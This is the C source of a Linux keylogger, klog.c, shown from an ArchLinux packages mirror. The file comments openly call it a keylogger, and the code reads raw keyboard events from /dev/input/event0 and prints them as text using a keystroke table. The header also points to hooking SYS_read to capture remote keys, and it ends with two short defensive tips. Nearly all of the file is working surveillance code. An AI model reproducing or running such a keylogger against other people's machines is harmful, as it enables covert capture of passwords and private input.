updated riak to 0.11.0
[mirrors/ArchLinux-Packages.git] / klog / klog.c
1 /* klog.c v0.6
2 * <~~Harvie 2oo8
3 * THX2: Dayvee (Idea),
4 * joe@aol.com (Reversing),
5 * -=Punka][Tux=- (BugReport),
6 * Warriant's code (Inspiration),
7 * Linus (God Blessed Linux)
8 *
9 * Converts /dev/input/event0 format to ASCII. (If you have nore keyboards,)
10 * In other words: this is keylogger for Linux.
11 * If you have more keyboards, try other events (event1, ...eventX).
12 * Only local keyboard is supported,
13 * remote keys can be captured by hooking on SYS_read() system call.
14 *
15 * Build:
16 * - gcc argv[0].c -o argv[0]
17 *
18 * Usage (all examples do the same):
19 * - cat /dev/input/event0 | argv[0]
20 * - argv[0] /dev/input/event0
21 * - argv[0] -
22 *
23 * Adding new keystroke values:
24 * - <XXX> = keystroke id
25 * - set MAXSTROKE to 0 to get only keystroke values
26 *
27 * Defensive security:
28 * - chown & chmod /dev/input/event0
29 * - don't give cheap root to everybody
30 */
32 #include <stdio.h>
33 #include <stdlib.h>
34 #include <signal.h>
35 #define DEFAULTINPUT "/dev/input/event0"
37 #define MAXSTROKE 127 //Set higest keystroke code in DB (lower will not be converted)
38 char *strokes[] = { //KeyStroke DB for english QUERTZ keyboard:
39 "<0>", "[ESC]", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "-", "=", "[BKSP]",
40 "[TAB]", "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "[", "]", "[ENTER]\n",
41 "[CTRL-L]", "A", "S", "D", "F", "G", "H", "J", "K", "L", ";", "'", "`", "[SHIFT-L]", "\\",
42 "Z", "X", "C", "V", "B", "N", "M", ",", ".", "/", "[SHIFT-R]", "*", "[ALT-L]", " ",
43 "[CAPSL]","[F1]", "[F2]", "[F3]", "[F4]", "[F5]", "[F6]", "[F7]", "[F8]", "[F9]", "[F10]",
44 "[NUML]", "[SCRL]", "7", "8", "9", "-", "4", "5", "6", "+", "1", "2", "3", "0",
45 "[./DEL-NUM]", "<84>", "<85>", "[MACRO-\\|]", "[F11]", "[F12]",
46 "<89>", "<90>","<91>", "<92>", "<93>", "<94>", "<95>", "[ENTER-NUM]\n",
47 "[CTRL-R]", "/", "[PRT-SCR]", "[ALT-R(GR)]", "<101>",
48 "[HOME]", "[UP]", "[PG-UP]", "[LEFT]", "[RIGHT]", "[END]", "[DOWN]", "[PG-DN]", "[INS]", "[DEL]",
49 "<112>", "<113>", "<114>", "<115>", "<116>", "<117>", "<118>", "[PAUSE]",
50 "<120>","<121>", "<122>", "<123>", "<124>", "[WinbL0W$-L]", "[WIN-R]", "[CONTEXT-MENU]"
51 /* Hint:
52 [CAPSL][ESC] = CapsLock On
53 [CAPSL] = CapsLock Off
54 [NUML]<0> = NumLock On
55 [NUML] = NumLock Off
56 3[ESC]3 = Escape
57 */
58 };
60 void cleanup(void) {
61 fclose(stdin);
62 fclose(stdout);
63 }
65 static void sigint_handler(int signo) {
66 exit(0);
67 }
69 int main(int argc, char *argv[]) {
71 atexit(&cleanup);
72 signal(SIGINT, &sigint_handler);
73 signal(SIGTERM, &sigint_handler);
74 signal(SIGQUIT, &sigint_handler);
75 signal(SIGSEGV, &sigint_handler);
78 FILE *ftest;
79 printf("Reading data from: ");
80 if(argc > 1 && argv[1][0] != '-') {
81 ftest = freopen(argv[1], "rb", stdin);
82 printf("%s\n", argv[1]);
83 }
84 if(argc > 1 && argv[1][0] == '-') {
85 ftest = freopen(DEFAULTINPUT, "rb", stdin);
86 printf("%s\n", DEFAULTINPUT);
87 }
88 if(argc == 1) {
89 printf("STDIN\n", argv[1]);
90 }
92 if(ftest == NULL) {
93 printf("Failed to open file!\n\n");
94 return(1);
95 }
97 printf("Keystroke DB size: %d B (0-%d)\n\n", sizeof(strokes), MAXSTROKE);
99 unsigned char keystroke[17];
100 while(1) {
101 read(0, keystroke, 16);
102 if((int)keystroke[12] > 0 && (int)keystroke[12] < 6) {
103 if(keystroke[10] <= MAXSTROKE) {
104 printf("%s", strokes[keystroke[10]]);
105 } else {
106 printf("<%d>", keystroke[10]);
107 }
108 }
109 }
111 }
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